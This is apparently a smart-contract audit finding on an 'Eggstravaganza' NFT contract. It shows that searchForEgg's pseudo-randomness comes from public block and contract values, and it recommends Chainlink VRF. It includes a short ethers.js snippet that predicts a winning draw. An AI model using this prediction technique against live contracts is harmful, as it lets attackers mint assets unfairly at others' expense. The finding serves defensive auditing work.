Eggstravaganza

Summary

The searchForEgg function can be hacked since the variables used to calculate the pseudo-random number are all known public variables, hence any one can generate the pseudo random number and mint the NFT, there will be no randomness.

Vulnerability Details

1: block.timestamp: This is public variable that is known
2:block.prevrandao: This is known as block.difficulty(before merge) is also a public variable.
3:eggCounter: Is a public variable
4: msg.sender : Is the address of the function caller.

Since all these variables are known , the attacker can create the required psedu-random number everytime and call the serchForEgg function and mint infiinite amount of nfts.

Hack

const ethers = require("ethers");

const blockTimestamp = 1712222222; // simulate current block.timestamp
const prevrandao = "0xabc123..."; // can be fetched from the previous block
const sender = "0xYourAddress";
const eggCounter = 42;

const data = ethers.utils.defaultAbiCoder.encode(
["uint256", "bytes32", "address", "uint256"],
[blockTimestamp, prevrandao, sender, eggCounter]
);
const hash = ethers.utils.keccak256(data);
const random = parseInt(hash.slice(2, 4), 16) % 100;

if (random < 20) {
console.log("Egg will be found!");
}

Impact

The eggFindThreshold variable is of no use , since the chance that someone would find the number is a lot than the threshold

Tools Used

Foundry

Recommendations

Use Chainlink VRF to generate a random number.